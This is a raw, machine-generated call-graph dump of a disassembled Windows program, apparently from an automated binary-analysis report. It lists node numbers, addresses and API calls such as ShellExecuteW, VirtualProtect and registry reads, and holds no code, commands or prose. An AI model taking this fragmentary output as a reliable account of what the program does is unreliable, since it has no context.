96106->96113 96111 1ef2c6 __dosmaperr 20 API calls 96107->96111 96108->96086 96112 1f5ae7 96109->96112 96114 1f564e __wsopen_s 39 API calls 96110->96114 96115 1f5b33 96111->96115 96116 1f27ec _abort 26 API calls 96112->96116 96113->96110 96117 1f5b6a 96114->96117 96118 1ef2d9 _free 20 API calls 96115->96118 96116->96138 96119 1f5b6f 96117->96119 96120 1f5ba8 96117->96120 96121 1f5b3b 96118->96121 96124 1f5b95 96119->96124 96125 1f5b73 96119->96125 96122 1f5bbc 96120->96122 96123 1f5c02 WriteFile 96120->96123 96126 1f27ec _abort 26 API calls 96121->96126 96127 1f5bc4 96122->96127 96128 1f5bf2 96122->96128 96130 1f5c25 GetLastError 96123->96130 96136 1f5b8b 96123->96136 96131 1f542e __wsopen_s 45 API calls 96124->96131 96129 1f5c69 96125->96129 96134 1f55e1 __wsopen_s GetLastError WriteConsoleW CreateFileW 96125->96134 96126->96138 96132 1f5bc9 96127->96132 96133 1f5be2 96127->96133 96135 1f56c4 __wsopen_s 7 API calls 96128->96135 96137 1ef2d9 _free 20 API calls 96129->96137 96129->96138 96130->96136 96131->96136 96132->96129 96139 1f5bd2 96132->96139 96140 1f5891 __wsopen_s 8 API calls 96133->96140 96134->96136 96141 1f5be0 96135->96141 96136->96129 96136->96138 96143 1f5c45 96136->96143 96142 1f5c8e 96137->96142 96138->96103 96144 1f57a3 __wsopen_s 7 API calls 96139->96144 96140->96141 96141->96136 96145 1ef2c6 __dosmaperr 20 API calls 96142->96145 96146 1f5c4c 96143->96146 96147 1f5c60 96143->96147 96144->96141 96145->96138 96148 1ef2d9 _free 20 API calls 96146->96148 96149 1ef2a3 __dosmaperr 20 API calls 96147->96149 96150 1f5c51 96148->96150 96149->96138 96151 1ef2c6 __dosmaperr 20 API calls 96150->96151 96151->96138 96152->96071 96153->96085 96154->96087 96155->96086 96156->96085 96157->96074 96158->96078 96159->96085 96160->95976 96162 1ee60f 96161->96162 96163 1ee624 96161->96163 96199 1ef2d9 20 API calls _abort 96162->96199 96165 1edc0b 62 API calls 96163->96165 96169 1ee61f 96163->96169 96167 1ee638 96165->96167 96166 1ee614 96200 1f27ec 26 API calls _abort 96166->96200 96180 1f4d7a 96167->96180 96169->95978 96172 1ed955 __fread_nolock 26 API calls 96173 1ee646 96172->96173 96184 1f862f 96173->96184 96176 1f29c8 _free 20 API calls 96176->96169 96177->95973 96178->95980 96179->95980 96181 1ee640 96180->96181 96182 1f4d90 96180->96182 96181->96172 96182->96181 96183 1f29c8 _free 20 API calls 96182->96183 96183->96181 96185 1f863e 96184->96185 96186 1f8653 96184->96186 96204 1ef2c6 20 API calls _abort 96185->96204 96187 1f868e 96186->96187 96191 1f867a 96186->96191 96206 1ef2c6 20 API calls _abort 96187->96206 96190 1f8643 96205 1ef2d9 20 API calls _abort 96190->96205 96201 1f8607 96191->96201 96192 1f8693 96207 1ef2d9 20 API calls _abort 96192->96207 96196 1ee64c 96196->96169 96196->96176 96197 1f869b 96208 1f27ec 26 API calls _abort 96197->96208 96199->96166 96200->96169 96209 1f8585 96201->96209 96203 1f862b 96203->96196 96204->96190 96205->96196 96206->96192 96207->96197 96208->96196 96210 1f8591 __FrameHandler3::FrameUnwindToState 96209->96210 96220 1f5147 EnterCriticalSection 96210->96220 96212 1f859f 96213 1f85c6 96212->96213 96214 1f85d1 96212->96214 96221 1f86ae 96213->96221 96236 1ef2d9 20 API calls _abort 96214->96236 96217 1f85cc 96237 1f85fb LeaveCriticalSection __wsopen_s 96217->96237 96219 1f85ee __fread_nolock 96219->96203 96220->96212 96238 1f53c4 96221->96238 96223 1f86c4 96251 1f5333 21 API calls 3 library calls 96223->96251 96224 1f86be 96224->96223 96226 1f86f6 96224->96226 96229 1f53c4 __wsopen_s 26 API calls 96224->96229 96226->96223 96227 1f53c4 __wsopen_s 26 API calls 96226->96227 96230 1f8702 CloseHandle 96227->96230 96228 1f871c 96231 1f873e 96228->96231 96252 1ef2a3 20 API calls 2 library calls 96228->96252 96232 1f86ed 96229->96232 96230->96223 96233 1f870e GetLastError 96230->96233 96231->96217 96235 1f53c4 __wsopen_s 26 API calls 96232->96235 96233->96223 96235->96226 96236->96217 96237->96219 96239 1f53d1 96238->96239 96241 1f53e6 96238->96241 96240 1ef2c6 __dosmaperr 20 API calls 96239->96240 96243 1f53d6 96240->96243 96242 1ef2c6 __dosmaperr 20 API calls 96241->96242 96244 1f540b 96241->96244 96245 1f5416 96242->96245 96246 1ef2d9 _free 20 API calls 96243->96246 96244->96224 96248 1ef2d9 _free 20 API calls 96245->96248 96247 1f53de 96246->96247 96247->96224 96249 1f541e 96248->96249 96250 1f27ec _abort 26 API calls 96249->96250 96250->96247 96251->96228 96252->96231 96254 23257c 96253->96254 96256 232565 __fread_nolock 96253->96256 96255 1ee8c4 __fread_nolock 40 API calls 96254->96255 96255->96256 96256->96001 96258 1eea0c ___std_exception_copy 21 API calls 96257->96258 96259 23217f 96258->96259 96260 1eea0c ___std_exception_copy 21 API calls 96259->96260 96261 232190 96260->96261 96262 1eea0c ___std_exception_copy 21 API calls 96261->96262 96263 23219c 96262->96263 96263->96008 96271 232408 96264->96271 96265 2324c0 96276 232724 96265->96276 96267 2324c7 96267->96016 96268 2321cc 40 API calls 96268->96271 96271->96265 96271->96267 96271->96268 96272 232606 96271->96272 96280 232269 40 API calls 96271->96280 96273 232617 96272->96273 96274 23261d 96272->96274 96273->96274 96281 2326d7 96273->96281 96274->96271 96277 232731 96276->96277 96279 232742 96276->96279 96278 1edbb3 65 API calls 96277->96278 96278->96279 96279->96267 96280->96271 96282 232703 96281->96282 96283 232714 96281->96283 96284 1edbb3 65 API calls 96282->96284 96283->96273 96284->96283 96285->95604 96287 1c33fe _wcslen 96286->96287 96288 20311d 96287->96288 96289 1c3411 96287->96289 96291 1dfddb 22 API calls 96288->96291 96290 1ca587 22 API calls 96289->96290 96292 1c341e __fread_nolock 96290->96292 96293 203127 96291->96293 96292->95610 96294 1dfe0b 22 API calls 96293->96294 96295 203157 __fread_nolock 96294->96295 96297 1c7510 53 API calls 96296->96297 96298 247f90 96297->96298 96321 247fd5 messages 96298->96321 96334 248cd3 96298->96334 96300 248281 96301 24844f 96300->96301 96305 24828f 96300->96305 96375 248ee4 60 API calls 96301->96375 96304 24845e 96304->96305 96306 24846a 96304->96306 96347 247e86 96305->96347 96306->96321 96307 1c7510 53 API calls 96325 248049 96307->96325 96312 2482c8 96362 1dfc70 96312->96362 96315 248302 96369 1c63eb 22 API calls 96315->96369 96316 2482e8 96368 23359c 82 API calls __wsopen_s 96316->96368 96319 2482f3 GetCurrentProcess TerminateProcess 96319->96315 96320 248311 96370 1c6a50 22 API calls 96320->96370 96321->95373 96323 24832a 96332 248352 96323->96332 96371 1d04f0 22 API calls 96323->96371 96325->96300 96325->96307 96325->96321 96366 22417d 22 API calls __fread_nolock 96325->96366 96367 24851d 42 API calls _strftime 96325->96367 96326 2484c5 96326->96321 96330 2484d9 FreeLibrary 96326->96330 96327 248341 96372 248b7b 75 API calls 96327->96372 96330->96321 96332->96326 96373 1d04f0 22 API calls 96332->96373 96374 1caceb 23 API calls messages 96332->96374 96376 248b7b 75 API calls 96332->96376 96335 1caec9 22 API calls 96334->96335 96336 248cee CharLowerBuffW 96335->96336 96377 228e54 96336->96377 96340 1ca961 22 API calls 96341 248d2a 96340->96341 96342 1c6d25 22 API calls 96341->96342 96343 248d3e 96342->96343 96344 1c93b2 22 API calls 96343->96344 96346 248d48 _wcslen 96344->96346 96345 248e5e _wcslen 96345->96325 96346->96345 96384 24851d 42 API calls _strftime 96346->96384 96348 247ea1 96347->96348 96352 247eec 96347->96352 96349 1dfe0b 22 API calls 96348->96349 96351 247ec3 96349->96351 96350 1dfddb 22 API calls 96350->96351 96351->96350 96351->96352 96353 249096 96352->96353 96354 2492ab messages 96353->96354 96361 2490ba _strcat _wcslen 96353->96361 96354->96312 96355 1cb38f 39 API calls 96355->96361 96356 1cb567 39 API calls 96356->96361 96357 1cb6b5 39 API calls 96357->96361 96358 1c7510 53 API calls 96358->96361 96359 1eea0c 21 API calls ___std_exception_copy 96359->96361 96361->96354 96361->96355 96361->96356 96361->96357 96361->96358 96361->96359 96387 22efae 24 API calls _wcslen 96361->96387 96363 1dfc85 96362->96363 96364 1dfd1d VirtualProtect 96363->96364 96365 1dfceb 96363->96365 96364->96365 96365->96315 96365->96316 96366->96325 96367->96325 96368->96319 96369->96320 96370->96323 96371->96327 96372->96332 96373->96332 96374->96332 96375->96304 96376->96332 96378 228e74 _wcslen 96377->96378 96379 228f63 96378->96379 96381 228f68 96378->96381 96383 228ea9 96378->96383 96379->96340 96379->96346 96381->96379 96386 1dce60 41 API calls 96381->96386 96383->96379 96385 1dce60 41 API calls 96383->96385 96384->96345 96385->96383 96386->96381 96387->96361 96417 1c6270 96388->96417 96390 1c9fd2 96423 1ca4a1 96390->96423 96392 1c9fec 96392->95378 96395 20f7c4 96435 2296e2 84 API calls __wsopen_s 96395->96435 96396 20f699 96405 1dfddb 22 API calls 96396->96405 96397 1c9eb5 96397->96390 96397->96395 96397->96396 96398 1ca12c __fread_nolock 96397->96398 96399 1ca4a1 22 API calls 96397->96399 96403 1ca6c3 22 API calls 96397->96403 96408 1ca405 96397->96408 96412 1ca587 22 API calls 96397->96412 96413 1caec9 22 API calls 96397->96413 96422 1c4573 41 API calls _wcslen 96397->96422 96432 1c48c8 23 API calls 96397->96432 96433 1c49bd 22 API calls __fread_nolock 96397->96433 96434 1ca673 22 API calls 96397->96434 96398->96395 96398->96408 96399->96397 96401 20f7d2 96407 1ca4a1 22 API calls 96401->96407 96403->96397 96406 20f754 96405->96406 96410 1dfe0b 22 API calls 96406->96410 96409 20f7e8 96407->96409 96408->96392 96436 2296e2 84 API calls __wsopen_s 96408->96436 96409->96392 96410->96398 96412->96397 96414 1ca0db CharUpperBuffW 96413->96414 96431 1ca673 22 API calls 96414->96431 96416->95382 96418 1dfe0b 22 API calls 96417->96418 96419 1c6295 96418->96419 96420 1dfddb 22 API calls 96419->96420 96421 1c62a3 96420->96421 96421->96397 96422->96397 96424 1ca52b 96423->96424 96430 1ca4b1 __fread_nolock 96423->96430 96426 1dfe0b 22 API calls 96424->96426 96425 1dfddb 22 API calls 96427 1ca4b8 96425->96427 96426->96430 96428 1ca4d6 96427->96428 96429 1dfddb 22 API calls 96427->96429 96428->96392 96429->96428 96430->96425 96431->96397 96432->96397 96433->96397 96434->96397 96435->96401 96436->96392 96438 22d4d5 96437->96438 96439 22dbdc GetFileAttributesW 96437->96439 96438->95156 96439->96438 96440 22dbe8 FindFirstFileW 96439->96440 96440->96438 96441 22dbf9 FindClose 96440->96441 96441->96438 96442->95396 96444 1cae01 96443->96444 96447 1cae1c messages 96443->96447 96445 1caec9 22 API calls 96444->96445 96446 1cae09 CharUpperBuffW 96445->96446 96446->96447 96447->95180 96449 1cacae 96448->96449 96450 1cacd1 96449->96450 96478 23359c 82 API calls __wsopen_s 96449->96478 96450->95233 96453 20fadb 96452->96453 96454 1cad92 96452->96454 96455 1dfddb 22 API calls 96454->96455 96456 1cad99 96455->96456 96479 1cadcd 96456->96479 96459->95229 96460->95234 96461->95234 96462->95185 96463->95222 96464->95198 96465->95222 96466->95222 96467->95233 96468->95233 96469->95233 96470->95233 96471->95233 96472->95233 96473->95211 96474->95222 96475->95217 96476->95226 96477->95222 96478->96450 96483 1caddd 96479->96483 96480 1cadb6 96480->95233 96481 1dfddb 22 API calls 96481->96483 96482 1ca961 22 API calls 96482->96483 96483->96480 96483->96481 96483->96482 96484 1ca8c7 22 API calls 96483->96484 96485 1cadcd 22 API calls 96483->96485 96484->96483 96485->96483 96486->95256 96487->95256 96488->95255 96489->95255 96490->95242 96491->95255 96492 1cf7bf 96493 1cfcb6 96492->96493 96494 1cf7d3 96492->96494 96529 1caceb 23 API calls messages 96493->96529 96495 1cfcc2 96494->96495 96497 1dfddb 22 API calls 96494->96497 96530 1caceb 23 API calls messages 96495->96530 96499 1cf7e5 96497->96499 96499->96495 96500 1cf83e 96499->96500 96501 1cfd3d 96499->96501 96503 1d1310 235 API calls 96500->96503 96526 1ced9d messages 96500->96526 96531 231155 22 API calls 96501->96531 96524 1cec76 messages 96503->96524 96505 1cfef7 96510 1ca8c7 22 API calls 96505->96510 96505->96526 96506 1dfddb 22 API calls 96506->96524 96508 214600 96513 1ca8c7 22 API calls 96508->96513 96508->96526 96509 214b0b 96533 23359c 82 API calls __wsopen_s 96509->96533 96510->96526 96513->96526 96515 1e0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96515->96524 96516 1ca8c7 22 API calls 96516->96524 96517 1cfbe3 96520 214bdc 96517->96520 96525 1cf3ae messages 96517->96525 96517->96526 96518 1ca961 22 API calls 96518->96524 96519 1e00a3 29 API calls pre_c_initialization 96519->96524 96534 23359c 82 API calls __wsopen_s 96520->96534 96522 214beb 96535 23359c 82 API calls __wsopen_s 96522->96535 96523 1e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96523->96524 96524->96505 96524->96506 96524->96508 96524->96509 96524->96515 96524->96516 96524->96517 96524->96518 96524->96519 96524->96522 96524->96523 96524->96525 96524->96526 96527 1d01e0 235 API calls 2 library calls 96524->96527 96528 1d06a0 41 API calls messages 96524->96528 96525->96526 96532 23359c 82 API calls __wsopen_s 96525->96532 96527->96524 96528->96524 96529->96495 96530->96501 96531->96526 96532->96526 96533->96526 96534->96522 96535->96526 96536 1c1098 96541 1c42de 96536->96541 96540 1c10a7 96542 1ca961 22 API calls 96541->96542 96543 1c42f5 GetVersionExW 96542->96543 96544 1c6b57 22 API calls 96543->96544 96545 1c4342 96544->96545 96546 1c93b2 22 API calls 96545->96546 96548 1c4378 96545->96548 96547 1c436c 96546->96547 96562 1c37a0 96547->96562 96549 1c441b GetCurrentProcess IsWow64Process 96548->96549 96552 2037df 96548->96552 96551 1c4437 96549->96551 96553 1c444f LoadLibraryA 96551->96553 96554 203824 GetSystemInfo 96551->96554 96555 1c449c GetSystemInfo 96553->96555 96556 1c4460 GetProcAddress 96553->96556 96558 1c4476 96555->96558 96556->96555 96557 1c4470 GetNativeSystemInfo 96556->96557 96557->96558 96559 1c447a FreeLibrary 96558->96559 96560 1c109d 96558->96560 96559->96560 96561 1e00a3 29 API calls __onexit 96560->96561 96561->96540 96563 1c37ae 96562->96563 96564 1c93b2 22 API calls 96563->96564 96565 1c37c2 96564->96565 96565->96548 96566 1f90fa 96567 1f9107 96566->96567 96571 1f911f 96566->96571 96616 1ef2d9 20 API calls _abort 96567->96616 96569 1f910c 96617 1f27ec 26 API calls _abort 96569->96617 96572 1f9117 96571->96572 96573 1f917a 96571->96573 96618 1ffdc4 21 API calls 2 library calls 96571->96618 96575 1ed955 __fread_nolock 26 API calls 96573->96575 96576 1f9192 96575->96576 96586 1f8c32 96576->96586 96578 1f9199 96578->96572 96579 1ed955 __fread_nolock 26 API calls 96578->96579 96580 1f91c5 96579->96580 96580->96572 96581 1ed955 __fread_nolock 26 API calls 96580->96581 96582 1f91d3 96581->96582 96582->96572 96583 1ed955 __fread_nolock 26 API calls 96582->96583 96584 1f91e3 96583->96584 96585 1ed955 __fread_nolock 26 API calls 96584->96585 96585->96572 96587 1f8c3e __FrameHandler3::FrameUnwindToState 96586->96587 96588 1f8c5e 96587->96588 96589 1f8c46 96587->96589 96591 1f8d24 96588->96591 96596 1f8c97 96588->96596 96620 1ef2c6 20 API calls _abort 96589->96620 96627 1ef2c6 20 API calls _abort 96591->96627 96593 1f8c4b 96621 1ef2d9 20 API calls _abort 96593->96621 96594 1f8d29 96628 1ef2d9 20 API calls _abort 96594->96628 96599 1f8cbb 96596->96599 96600 1f8ca6 96596->96600 96598 1f8c53 __fread_nolock 96598->96578 96619 1f5147 EnterCriticalSection 96599->96619 96622 1ef2c6 20 API calls _abort 96600->96622 96603 1f8cab 96623 1ef2d9 20 API calls _abort 96603->96623 96604 1f8cc1 96606 1f8cdd 96604->96606 96607 1f8cf2 96604->96607 96624 1ef2d9 20 API calls _abort 96606->96624 96611 1f8d45 __fread_nolock 38 API calls 96607->96611 96609 1f8cb3 96629 1f27ec 26 API calls _abort 96609->96629 96613 1f8ced 96611->96613 96612 1f8ce2 96625 1ef2c6 20 API calls _abort 96612->96625 96626 1f8d1c LeaveCriticalSection __wsopen_s 96613->96626 96616->96569 96617->96572 96618->96573 96619->96604 96620->96593 96621->96598 96622->96603 96623->96609 96624->96612 96625->96613 96626->96598 96627->96594 96628->96609 96629->96598 96630 202ba5 96631 1c2b25 96630->96631 96632 202baf 96630->96632 96658 1c2b83 7 API calls 96631->96658 96673 1c3a5a 96632->96673 96635 202bb8 96637 1c9cb3 22 API calls 96635->96637 96640 202bc6 96637->96640 96639 1c2b2f 96650 1c2b44 96639->96650 96662 1c3837 96639->96662 96641 202bf5 96640->96641 96642 202bce 96640->96642 96645 1c33c6 22 API calls 96641->96645 96644 1c33c6 22 API calls 96642->96644 96646 202bd9 96644->96646 96647 202bf1 GetForegroundWindow ShellExecuteW 96645->96647 96648 1c6350 22 API calls 96646->96648 96654 202c26 96647->96654 96652 202be7 96648->96652 96649 1c2b5f 96656 1c2b66 SetCurrentDirectoryW 96649->96656 96650->96649 96672 1c30f2 Shell_NotifyIconW ___scrt_fastfail 96650->96672 96655 1c33c6 22 API calls 96652->96655 96654->96649 96655->96647 96657 1c2b7a 96656->96657 96680 1c2cd4 7 API calls 96658->96680 96660 1c2b2a 96661 1c2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96660->96661 96661->96639 96663 1c3862 ___scrt_fastfail 96662->96663 96681 1c4212 96663->96681 96666 1c38e8 96668 203386 Shell_NotifyIconW 96666->96668 96669 1c3906 Shell_NotifyIconW 96666->96669 96685 1c3923 96669->96685 96671 1c391c 96671->96650 96672->96649 96708 201f50 96673->96708 96676 1c9cb3 22 API calls 96677 1c3a8d 96676->96677 96710 1c3aa2 96677->96710 96679 1c3a97 96679->96635 96680->96660 96682 2035a4 96681->96682 96683 1c38b7 96681->96683 96682->96683 96684 2035ad DestroyIcon 96682->96684 96683->96666 96707 22c874 42 API calls _strftime 96683->96707 96684->96683 96686 1c393f 96685->96686 96705 1c3a13 96685->96705 96687 1c6270 22 API calls 96686->96687 96688 1c394d 96687->96688 96689 203393 LoadStringW 96688->96689 96690 1c395a 96688->96690 96692 2033ad 96689->96692 96691 1c6b57 22 API calls 96690->96691 96693 1c396f 96691->96693 96696 1ca8c7 22 API calls 96692->96696 96700 1c3994 ___scrt_fastfail 96692->96700 96694 1c397c 96693->96694 96695 2033c9 96693->96695 96694->96692 96697 1c3986 96694->96697 96698 1c6350 22 API calls 96695->96698 96696->96700 96699 1c6350 22 API calls 96697->96699 96701 2033d7 96698->96701 96699->96700 96703 1c39f9 Shell_NotifyIconW 96700->96703 96701->96700 96702 1c33c6 22 API calls 96701->96702 96704 2033f9 96702->96704 96703->96705 96706 1c33c6 22 API calls 96704->96706 96705->96671 96706->96700 96707->96666 96709 1c3a67 GetModuleFileNameW 96708->96709 96709->96676 96711 201f50 __wsopen_s 96710->96711 96712 1c3aaf GetFullPathNameW 96711->96712 96713 1c3ace 96712->96713 96714 1c3ae9 96712->96714 96715 1c6b57 22 API calls 96713->96715 96716 1ca6c3 22 API calls 96714->96716 96717 1c3ada 96715->96717 96716->96717 96718 1c37a0 22 API calls 96717->96718 96719 1c3ae6 96718->96719 96719->96679 96720 1e03fb 96721 1e0407 __FrameHandler3::FrameUnwindToState 96720->96721 96749 1dfeb1 96721->96749 96723 1e040e 96724 1e0561 96723->96724 96727 1e0438 96723->96727 96776 1e083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96724->96776 96726 1e0568 96777 1e4e52 28 API calls _abort 96726->96777 96729 1e0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96727->96729 96760 1f247d 96727->96760 96737 1e04d8 96729->96737 96772 1e4e1a 38 API calls 2 library calls 96729->96772 96730 1e056e 96778 1e4e04 28 API calls _abort 96730->96778 96734 1e0576 96735 1e0457 96768 1e0959 96737->96768 96740 1e04de 96741 1e04f3 96740->96741 96773 1e0992 GetModuleHandleW 96741->96773 96743 1e04fa 96743->96726 96744 1e04fe 96743->96744 96745 1e0507 96744->96745 96774 1e4df5 28 API calls _abort 96744->96774 96775 1e0040 13 API calls 2 library calls 96745->96775 96748 1e050f 96748->96735 96750 1dfeba 96749->96750 96779 1e0698 IsProcessorFeaturePresent 96750->96779 96752 1dfec6 96780 1e2c94 10 API calls 3 library calls 96752->96780 96754 1dfecb 96755 1dfecf 96754->96755 96781 1f2317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96754->96781 96755->96723 96757 1dfed8 96758 1dfee6 96757->96758 96782 1e2cbd 8 API calls 3 library calls 96757->96782 96758->96723 96763 1f2494 96760->96763 96762 1e0451 96762->96735 96764 1f2421 96762->96764 96783 1e0a8c 96763->96783 96766 1f2450 96764->96766 96765 1e0a8c CatchGuardHandler 5 API calls 96767 1f2479 96765->96767 96766->96765 96767->96729 96791 1e2340 96768->96791 96771 1e097f 96771->96740 96772->96737 96773->96743 96774->96745 96775->96748 96776->96726 96777->96730 96778->96734 96779->96752 96780->96754 96781->96757 96782->96755 96784 1e0a97 IsProcessorFeaturePresent 96783->96784 96785 1e0a95 96783->96785 96787 1e0c5d 96784->96787 96785->96762 96790 1e0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96787->96790 96789 1e0d40 96789->96762 96790->96789 96792 1e096c GetStartupInfoW 96791->96792 96792->96771 96793 1c105b 96798 1c344d 96793->96798 96795 1c106a 96829 1e00a3 29 API calls __onexit 96795->96829 96797 1c1074 96799 1c345d __wsopen_s 96798->96799 96800 1ca961 22 API calls 96799->96800 96801 1c3513 96800->96801 96802 1c3a5a 24 API calls 96801->96802 96803 1c351c 96802->96803 96830 1c3357 96803->96830 96806 1c33c6 22 API calls 96807 1c3535 96806->96807 96836 1c515f 96807->96836 96810 1ca961 22 API calls 96811 1c354d 96810->96811 96812 1ca6c3 22 API calls 96811->96812 96813 1c3556 RegOpenKeyExW 96812->96813 96814 203176 RegQueryValueExW 96813->96814 96818 1c3578 96813->96818 96815 203193 96814->96815 96816 20320c RegCloseKey 96814->96816 96817 1dfe0b 22 API calls 96815->96817 96816->96818 96828 20321e _wcslen 96816->96828 96819 2031ac 96817->96819 96818->96795 96820 1c5722 22 API calls 96819->96820 96821 2031b7 RegQueryValueExW 96820->96821 96822 2031d4 96821->96822 96824 2031ee messages 96821->96824 96823 1c6b57 22 API calls 96822->96823 96823->96824 96824->96816 96825 1c4c6d 22 API calls 96825->96828 96826 1c9cb3 22 API calls 96826->96828 96827 1c515f 22 API calls 96827->96828 96828->96818 96828->96825 96828->96826 96828->96827 96829->96797 96831 201f50 __wsopen_s 96830->96831 96832 1c3364 GetFullPathNameW 96831->96832 96833 1c3386 96832->96833 96834 1c6b57 22 API calls 96833->96834 96835 1c33a4 96834->96835 96835->96806 96837 1c516e 96836->96837 96841 1c518f __fread_nolock 96836->96841 96839 1dfe0b 22 API calls 96837->96839 96838 1dfddb 22 API calls 96840 1c3544 96838->96840 96839->96841 96840->96810 96841->96838 96842 1c3156 96845 1c3170 96842->96845 96846 1c3187 96845->96846 96847 1c318c 96846->96847 96848 1c31eb 96846->96848 96885 1c31e9 96846->96885 96852 1c3199 96847->96852 96853 1c3265 PostQuitMessage 96847->96853 96850 202dfb 96848->96850 96851 1c31f1 96848->96851 96849 1c31d0 DefWindowProcW 96877 1c316a 96849->96877 96901 1c18e2 10 API calls 96850->96901 96854 1c321d SetTimer RegisterWindowMessageW 96851->96854 96855 1c31f8 96851->96855 96857 1c31a4 96852->96857 96858 202e7c 96852->96858 96853->96877 96862 1c3246 CreatePopupMenu 96854->96862 96854->96877 96859 202d9c 96855->96859 96860 1c3201 KillTimer 96855->96860 96863 1c31ae 96857->96863 96864 202e68 96857->96864 96905 22bf30 34 API calls ___scrt_fastfail 96858->96905 96872 202da1 96859->96872 96873 202dd7 MoveWindow 96859->96873 96897 1c30f2 Shell_NotifyIconW ___scrt_fastfail 96860->96897 96861 202e1c 96902 1de499 42 API calls 96861->96902 96862->96877 96869 1c31b9 96863->96869 96870 202e4d 96863->96870 96890 22c161 96864->96890 96878 1c31c4 96869->96878 96879 1c3253 96869->96879 96870->96849 96904 220ad7 22 API calls 96870->96904 96871 202e8e 96871->96849 96871->96877 96874 202dc6 SetFocus 96872->96874 96875 202da7 96872->96875 96873->96877 96874->96877 96875->96878 96880 202db0 96875->96880 96876 1c3214 96898 1c3c50 DeleteObject DestroyWindow 96876->96898 96878->96849 96903 1c30f2 Shell_NotifyIconW ___scrt_fastfail 96878->96903 96899 1c326f 44 API calls ___scrt_fastfail 96879->96899 96900 1c18e2 10 API calls 96880->96900 96885->96849 96886 1c3263 96886->96877 96888 202e41 96889 1c3837 49 API calls 96888->96889 96889->96885 96891 22c276 96890->96891 96892 22c179 ___scrt_fastfail 96890->96892 96891->96877 96893 1c3923 24 API calls 96892->96893 96895 22c1a0 96893->96895 96894 22c25f KillTimer SetTimer 96894->96891 96895->96894 96896 22c251 Shell_NotifyIconW 96895->96896 96896->96894 96897->96876 96898->96877 96899->96886 96900->96877 96901->96861 96902->96878 96903->96888 96904->96885 96905->96871 96906 1c2e37 96907 1ca961 22 API calls 96906->96907 96908 1c2e4d 96907->96908 96985 1c4ae3 96908->96985 96910 1c2e6b 96911 1c3a5a 24 API calls 96910->96911 96912 1c2e7f 96911->96912 96913 1c9cb3 22 API calls 96912->96913 96914 1c2e8c 96913->96914 96915 1c4ecb 94 API calls 96914->96915 96916 1c2ea5 96915->96916 96917 202cb0 96916->96917 96918 1c2ead 96916->96918 97015 232cf9 96917->97015 96921 1ca8c7 22 API calls 96918->96921 96920 202cc3 96922 1c4f39 68 API calls 96920->96922 96923 202ccf 96920->96923 96924 1c2ec3 96921->96924 96922->96923 96926 1c4f39 68 API calls 96923->96926 96999 1c6f88 22 API calls 96924->96999 96929 202ce5 96926->96929 96927 1c2ecf 96928 1c9cb3 22 API calls 96927->96928 96930 1c2edc 96928->96930 97041 1c3084 22 API calls 96929->97041 97000 1ca81b 41 API calls 96930->97000 96932 1c2eec 96935 1c9cb3 22 API calls 96932->96935 96934 202d02 97042 1c3084 22 API calls 96934->97042 96937 1c2f12 96935->96937 97001 1ca81b 41 API calls 96937->97001 96938 202d1e 96940 1c3a5a 24 API calls 96938->96940 96941 202d44 96940->96941 97043 1c3084 22 API calls 96941->97043 96942 1c2f21 96945 1ca961 22 API calls 96942->96945 96944 202d50 96946 1ca8c7 22 API calls 96944->96946 96947 1c2f3f 96945->96947 96949 202d5e 96946->96949 97002 1c3084 22 API calls 96947->97002 97044 1c3084 22 API calls 96949->97044 96950 1c2f4b 97003 1e4a28 40 API calls 3 library calls 96950->97003 96953 202d6d 96956 1ca8c7 22 API calls 96953->96956 96954 1c2f59 96954->96929 96955 1c2f63 96954->96955 97004 1e4a28 40 API calls 3 library calls 96955->97004 96958 202d83 96956->96958 97045 1c3084 22 API calls 96958->97045 96959 1c2f6e 96959->96934 96961 1c2f78 96959->96961 97005 1e4a28 40 API calls 3 library calls 96961->97005 96962 202d90 96964 1c2f83 96964->96938 96965 1c2f8d 96964->96965 97006 1e4a28 40 API calls 3 library calls 96965->97006 96967 1c2f98 96968 1c2fdc 96967->96968 97007 1c3084 22 API calls 96967->97007 96968->96953 96969 1c2fe8 96968->96969 96969->96962 97009 1c63eb 22 API calls 96969->97009 96971 1c2fbf 96973 1ca8c7 22 API calls 96971->96973 96975 1c2fcd 96973->96975 96974 1c2ff8 97010 1c6a50 22 API calls 96974->97010 97008 1c3084 22 API calls 96975->97008 96978 1c3006 97011 1c70b0 23 API calls 96978->97011 96982 1c3021 96983 1c3065 96982->96983 97012 1c6f88 22 API calls 96982->97012 97013 1c70b0 23 API calls 96982->97013 97014 1c3084 22 API calls 96982->97014 96986 1c4af0 __wsopen_s 96985->96986 96987 1c6b57 22 API calls 96986->96987 96988 1c4b22 96986->96988 96987->96988 96989 1c4c6d 22 API calls 96988->96989 96998 1c4b58 96988->96998 96989->96988 96990 1c9cb3 22 API calls 96992 1c4c52 96990->96992 96991 1c9cb3 22 API calls 96991->96998 96993 1c515f 22 API calls 96992->96993 96996 1c4c5e 96993->96996 96994 1c4c6d 22 API calls 96994->96998 96995 1c515f 22 API calls 96995->96998 96996->96910 96997 1c4c29 96997->96990 96997->96996 96998->96991 96998->96994 96998->96995 96998->96997 96999->96927 97000->96932 97001->96942 97002->96950 97003->96954 97004->96959 97005->96964 97006->96967 97007->96971 97008->96968 97009->96974 97010->96978 97011->96982 97012->96982 97013->96982 97014->96982 97016 232d15 97015->97016 97017 1c511f 64 API calls 97016->97017 97018 232d29 97017->97018 97019 232e66 75 API calls 97018->97019 97020 232d3b 97019->97020 97021 1c50f5 40 API calls 97020->97021 97038 232d3f 97020->97038 97022 232d56 97021->97022 97023 1c50f5 40 API calls 97022->97023 97024 232d66 97023->97024 97025 1c50f5 40 API calls 97024->97025 97026 232d81 97025->97026 97027 1c50f5 40 API calls 97026->97027 97028 232d9c 97027->97028 97029 1c511f 64 API calls 97028->97029 97030 232db3 97029->97030 97031 1eea0c ___std_exception_copy 21 API calls 97030->97031 97032 232dba 97031->97032 97033 1eea0c ___std_exception_copy 21 API calls 97032->97033 97034 232dc4 97033->97034 97035 1c50f5 40 API calls 97034->97035 97036 232dd8 97035->97036 97037 2328fe 27 API calls 97036->97037 